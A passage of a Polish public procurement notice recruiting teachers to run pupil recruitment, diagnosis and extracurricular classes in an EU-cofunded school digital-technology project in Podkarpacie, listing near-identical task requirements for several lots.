c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część nr 3 Zajęcia dydaktyczno-wyrównawcze - językowe (język angielski) i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4  Zajęcia rozwojowe - humanistyczne i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część nr 5  Zajęcia rozwojowe - matematyczno-przyrodnicze i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część nr 6  Zajęcia rozwojowe - językowe(język angielski) i rekrutacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Nabór nauczycieli do prowadzenia rekrutacji oraz pozalekcyjnych zajęć dydaktyczno-wyrównawczych i rozwojowych w ramach projektu PO KL, poddziałanie 9.1.2. pt. Technologie cyfrowe jako systemowe narzędzie wspomagające realizację programów rozwojowych oraz podnoszące jakość i atrakcyjność oferty edukacyjnej szkół Podkarpacia - realizowanego w okresie od 01.02.2013 r. do 31.01.2015 r.:  
Szczegółowy wykaz ilości zajęć i rekrutacji:
1.	Zajęcia dydaktyczno-wyrównawcze:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.

2.	Zajęcia rozwojowe:
a.	Zajęcia z przedmiotów humanistycznych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
b.	Zajęcia z przedmiotów językowych (język angielski): 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
c.	Zajęcia z przedmiotów matematyczno-przyrodniczych: 72 h., rekrutacja 6-8 (grupa) uczniów w klasach IV-VI, średnio 2 godziny zajęć tygodniowo.
Szczegółowy zakres zadań obejmuje:
a.	Rekrutację (zgodnie z regulaminem rekrutacji) min. jednej grupy uczniów (min. 6 uczniów). Rekrutacja min. 2 godziny miesięcznie w ramach jednego rodzaju zajęcć i jednej grupy przedmiotowej w szkole (szkoła udostępni salę do prowadzenia rekrutacji). Zleceniobiorca przygotuje wykaz godzin, w których dostępny będzie w punkcie rekrutacyjnym.
b.	Przeprowadzenie diagnozy uczniów na systemie informatycznym,
c.	Prowadzenie zajęć zgodnie z wytycznymi projektowymi,
d.	Wykorzystywanie najnowszych narzędzi edukacyjnych, które zapewni szkoła,
e.	Obsługę wdrożonych systemów (system e-learningowy oraz system do diagnozy uczniów) w celu zrekrutowania uczniów oraz rozpoczęcia szkoleń przy użyciu e-kursów,
f.	Wypełnianie dokumentacji projektowej tj. deklaracja przystąpienia do projektu, upoważnienia, dziennik zajęć, harmonogram zajęć, zestawienia ilościowe oraz innych dokumentów niezbędnych w procesie realizacji projektu. Deklarację przystąpienia ucznia do projektu oraz pozostałe upoważnia podpisuje rodzic / opiekun prawny ucznia,
g.	Informowanie uczniów na zajęciach o współfinansowaniu projektu z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,
h.	Prowadzenie diagnozy uczniów po przejściu kolejnych etapów kursu,
i.	Ustalanie z osobą nadzorującą zajęcia w ramach projektu przydział sal szkoleniowych, diagnostycznych i rekrutacyjnych oraz godzin w ramach których odbywać się będą zajęcia, rekrutacja i diagnoza,
j.	Przedkładania koordynatorowi projektu harmonogramu zajęć na każdy kolejny miesiąc, dwa tygodnie przed rozpoczęciem zajęć oraz bieżące informowania o ewentualnych zmianach,
k.	Pomoc uczniom w uruchamianiu sprzętu informatycznego (tablety, laptopy, tablice multimedialne, rzutniki) oraz dbanie o to, by sprzęt po każdych zajęciach był odłożony w wyznaczone miejsce. W przypadku tabletów należy pilnować optymalnego naładowania baterii umożliwiającej użytkowanie sprzętu na zajęciach,
l.	Prowadzenie systemu e-portfolio, zadawanie zadań i nadzór nad postępami ucznia,
m.	Zgłaszanie usterek sprzętu osobie odpowiedzialnej za nadzór nad zajęciami oraz informowanie o ewentualnych(proponowanych) zmianach we wdrożonych systemach,
n.	Miesięcznego przedkładania rachunku lub faktury za wykonaną usługę zgodnie ze złożoną ofertą,
o.	Dbanie o ochronę danych osobowych zgodnie z ustawą,
p.	Odbycie szkolenia w zakresie wdrożonych systemów informatycznych min. 4 godziny w terminie i lokalizacji zatwierdzonej przez biuro projektu,
q.	Przeprowadzanie ankiet z uczniami przed rozpoczęciem zajęć, po zakończeniu pierwszego semestru oraz na zakończenie zajęć,
r.	Przeprowadzenie testów kontrolnych (system do diagnozy) przed rozpoczęciem zajęć oraz na ich zakończenie,
s.	Sporządzanie wykazu przepracowanych godzin do listy płac, sprawozdań  półrocznych na formularzach dostarczonych przez koordynatora projektu - raz na koniec półrocza i na koniec roku szkolnego.
